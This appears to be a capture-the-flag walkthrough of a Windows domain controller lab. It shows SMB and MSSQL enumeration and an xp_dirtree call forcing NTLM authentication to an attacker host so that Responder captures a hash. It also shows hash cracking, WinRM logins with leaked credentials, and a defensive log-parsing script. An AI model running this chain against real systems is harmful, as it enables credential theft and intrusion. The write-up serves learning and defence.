Enumeration

Starting with a comprehensive nmap scan to discover all open ports and services:

sudo nmap -sS -sC -A 10.10.11.202 -T4 -oN first.scan -p- -Pn

Key Findings

The scan reveals a Windows Domain Controller running multiple services:

  • Port 53: DNS
  • Port 88: Kerberos
  • Port 389/636: LDAP (Domain: sequel.htb)
  • Port 445: SMB
  • Port 1433: Microsoft SQL Server 2019
  • Port 5985: WinRM

Domain identified: sequel.htb with hostname dc.sequel.htb

SMB Enumeration

Checking SMB shares as a guest user:

smbclient //10.10.11.202/Public

Found a publicly accessible share containing SQL Server Procedures.pdf. The PDF reveals database credentials:

  • Username: PublicUser
  • Password: GuestUserCantWrite1

Initial Access via MSSQL

Connecting to MSSQL

Using the discovered credentials to connect to the SQL Server:

impacket-mssqlclient PublicUser:GuestUserCantWrite1@10.10.11.202

Hash Capture with Responder

Exploiting xp_dirtree to force an NTLM authentication back to our attack box:

EXEC MASTER.sys.xp_dirtree '\\10.10.14.13\test', 1, 1

Start Responder to capture the authentication attempt:

sudo responder -I tun0 -v

Successfully captured an NTLMv2 hash for the user sql_svc (the account the SQL Server service runs as, which is the identity used for the outbound SMB connection):

sql_svc::sequel:6a1a93a00715eb34:25621106FDB7E05C6DA08AF595E36E69:...

Cracking the Hash

Using John the Ripper to crack the captured hash:

john --wordlist=/usr/share/wordlists/rockyou.txt hash

Cracked credentials: sql_svc:REGGIE1234ronnie

Foothold

WinRM Access

Using Evil-WinRM with the cracked credentials:

evil-winrm -i sequel.htb -u sql_svc -p "REGGIE1234ronnie"

Successfully gained a foothold as sql_svc. Found another user on the system: Ryan.Cooper.

Lateral Movement

Manual Enumeration

While exploring the file system, I discovered SQL Server logs at:

C:\SQLServer\Logs\ERRORLOG.BAK

The log file contained failed login attempts, one of which leaks a credential:

2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]

'NuclearMosquito3' is not an account name; it is a password that was typed into the username field, a common mistake that SQL Server then records in plain text. The surrounding log entries show logon attempts for Ryan.Cooper from the same client, so the value belongs to that account.

Discovered credentials: Ryan.Cooper:NuclearMosquito3
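An added defender-side check, not part of the writeup: a small parser over SQL Server ERRORLOG lines that flags failed logons whose 'user' value is not a known account and is followed within a short window by an event for a real account from the same client, which is exactly the pattern the log above shows. The sample lines and the known-accounts set are constructed assumptions.

```python
import re
from datetime import datetime

# Constructed sample ERRORLOG excerpt (not the file from the writeup), written
# in the same entry format SQL Server uses for the Logon source.
SAMPLE_ERRORLOG = """\
2022-11-18 13:43:05.21 Logon       Logon failed for user 'sequel\\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:09.02 Logon       Login succeeded for user 'sequel\\Ryan.Cooper'. Connection made using Windows authentication. [CLIENT: 127.0.0.1]
2022-11-18 13:45:00.00 Logon       Logon failed for user 'PublicUser'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.13]
"""

# Assumed inventory of accounts that legitimately exist; any other value in the
# 'user' field of a failed logon is suspicious (likely a password typed there).
KNOWN_ACCOUNTS = {"ryan.cooper", "sql_svc", "publicuser", "sa"}

LOGON_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) Logon\s+"
    r"(?P<outcome>Logon failed|Login succeeded) for user '(?P<user>[^']+)'"
    r".*\[CLIENT: (?P<client>[^\]]+)\]"
)

def parse_logon_events(text):
    """Return (timestamp, outcome, user, client) for every Logon line in text."""
    events = []
    for line in text.splitlines():
        m = LOGON_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            events.append((ts, m["outcome"], m["user"], m["client"]))
    return events

def find_leaked_secrets(text, known_accounts=KNOWN_ACCOUNTS, window_s=60):
    """Flag failed logons for an unknown 'user' that are followed within window_s
    seconds by an event for a known account from the same client."""
    events = parse_logon_events(text)
    hits = []
    for i, (ts, outcome, user, client) in enumerate(events):
        if outcome != "Logon failed" or user.split("\\")[-1].lower() in known_accounts:
            continue
        for ts2, _, user2, client2 in events[i + 1:]:
            if (ts2 - ts).total_seconds() > window_s:
                break
            if client2 == client and user2.split("\\")[-1].lower() in known_accounts:
                hits.append({"leaked_value": user, "likely_account": user2,
                             "client": client, "at": ts.isoformat()})
                break
    return hits
```

Each hit names the leaked value and the account it most likely belongs to, so the owner can be forced to rotate the password and the log entry can be redacted.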

User Access

Connecting as Ryan Cooper via Evil-WinRM:

evil-winrm -i sequel.htb -u Ryan.Cooper -p 'NuclearMosquito3'

Successfully authenticated and retrieved the user flag:

3463bc90be59c8a5efc8f6e459bcd5a4

Key Takeaways

  1. SMB enumeration revealed publicly accessible documentation containing credentials
  2. MSSQL xp_dirtree abuse allowed NTLM hash capture via Responder
  3. Log file enumeration exposed additional credentials for lateral movement
  4. WinRM provided remote access once valid credentials were obtained

Next Steps

With user-level access established, the next phase would involve privilege escalation to Administrator and obtaining the root flag.